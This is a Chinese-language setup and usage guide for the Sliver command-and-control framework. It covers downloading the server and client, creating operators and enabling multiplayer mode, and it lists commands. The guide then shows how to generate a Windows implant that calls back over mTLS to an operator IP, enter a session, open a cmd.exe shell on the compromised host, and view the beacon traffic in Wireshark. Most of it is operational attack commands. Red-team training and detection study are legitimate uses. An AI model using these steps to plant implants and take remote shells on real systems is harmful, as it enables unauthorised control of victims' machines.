sliver

How to Set up & Use C2 Sliver

下载 wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-server_linux.zip

解压unzip unzip sliver-server_linux.zip

安装库sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64

创建一个player。创建一个会话用于之后监听

new-player –operator sigma –lhost 192.168.x.x

会在当前文件夹生成一个cfg文件，后面会用得上

此时会默认监听31337端口//客户端通过31337连接服务端

然后输入players来查看，如下图：

启动多人模式，输入命令multiplayer

---

客户端

跟下载服务端一样，先下载解压，然后安装依赖

wget https://github.com/BishopFox/sliver/releases/download/v1.0.6-beta/sliver-client_linux.zip

unzip sliver-client_linux.zip

sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64

首先保证服务端开启了多人模式，然后把cfg文件传输到root文件夹中：
sudo cp x_192.168.x.x.cfg /root/.sliver-client/configs

sliver的默认连接端口是31337，可以通过编辑配置文件进行修改：
cat ~/.sliver/configs/server.json //没找到

---

Commands:
=========
  clear       清除屏幕
  exit        退出shell
  help        帮助
  monitor     监视器
  wg-config   生成新的WireGuard配置
  wg-portfwd  列出WireGuard端口
  wg-socks    列出监听WireGuard服务器

Generic:
========
  aliases           列出当前别名
  armory            自动下载并安装扩展模块/别名
  background        后台活动会话
  beacons           信标管理
  builders          列出外部构建器
  canaries          列出以前生成的canaries
  cursed            谷歌浏览器开发者工具包？
  dns               启动DNS监听
  env               列出环境变量
  generate          生成二进制文件
  hosts             管理主机数据库
  http              启动http监听
  https             启动https监听
  implants          列出生成的马
  jobs              控制器
  licenses          开源许可
  loot              管理服务器商店
  mtls              启动mTLS监听
  prelude-operator  管理与Prelude操作员的连接？
  profiles          列出现有配置文件
  reaction          管理对事件的自动反应
  regenerate        重新生成注入？
  sessions          会话管理
  settings          管理客户端设置
  stage-listener    启动分段监听程序
  tasks             信标任务管理
  update            检查更新
  use               切换活动会话或信标
  version           显示版本信息
  websites          Host static content (used with HTTP C2)
  wg                启动WireGuard监听

Multiplayer:
============
  kick-operator  踢人
  multiplayer    开启多人模式
  new-operator   创建新的用户配置文件
  operators      管理员设置

---

生成木马：
generate –mtls <Server IP：port> –save test.exe –os Windows 默认8888

使用MTLS监听，使用jobs命令可以看到当前的任务，使用sessions可以查看信息，如下图

输入session -i x //比如sessions -i 1 进入一个会话，如下图

使用命令得到shell
shell –shell-path “C:\\windows\system32\cmd.exe”

按exit可以退出shell。exit退出交互式shell，直接会终止客户端的运行。重新运行客户端，使用sessions查看session 编号，重新进入。

---

sessions -i sessionID 进入会话

sessions -k sessionID 杀死会话

operators 查看用户在线

implants 查看生成的马

---

使用wireshark进行抓包，可以看到受控8888端口的流量，如下图。

也发现了心跳包，大小为55.而客户端与服务端的心跳大小为66